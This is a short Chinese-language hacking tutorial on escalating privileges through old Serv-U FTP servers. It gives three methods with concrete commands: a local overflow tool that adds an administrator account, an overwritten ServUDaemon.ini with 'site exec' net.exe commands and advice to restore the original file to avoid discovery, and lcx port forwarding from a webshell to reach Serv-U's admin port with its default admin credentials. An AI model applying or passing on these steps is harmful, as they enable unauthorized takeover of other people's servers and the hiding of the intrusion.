serv-u 提权进阶篇 新手必看

一。
serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

0.用Serv-U提权综合工具生成提权工具serv_u.exe
1.先上传 serv_u.exe 到一个盘符下 比如是d盘
2.执行命令 d:serv_u.exe
3.d:serv_u.exe “net user username password /add”  (注意命令要有引号)
4.d:serv_u.exe“net localgroup administrators username /add” (注意命令要有引号)

二。
serv-u ftp覆盖提权ServUDaemon.ini

首先要下载 serv-u 本地配置生成一个 ServUDaemon.ini 权限要大

然后上传到目标网站serv-u 目录里（上传前先备份网站ServUDaemon.ini  搞完后再给他上传回去 防止发现）

执行cmd
ftp 远程IP
有户名
密码
cd windows
cd system32
quote site exec net.exe user chao 123456 /add          //利用系统的net.exe文件加用户。
quote site exec net.exe localhost administrators chao /add    //提升为超级用户

三。
serv-u ftp转发端口

在目标WEBSHELL上运行LCX lcx -slave 你的IP 5000 127.0.0.1 43958

在本机上运行 lcx -listen 5000 21

打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator  密码#l@$ak#.lk;0@P

此时的连接过程是本机连接21端口------------>转发往本机5000端口-------------->管道连接至远程机5000端口------------>转发至远程43958端口

连接成功后,在本机登陆SERV_U就相当于登陆了远程的SERV_U

你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令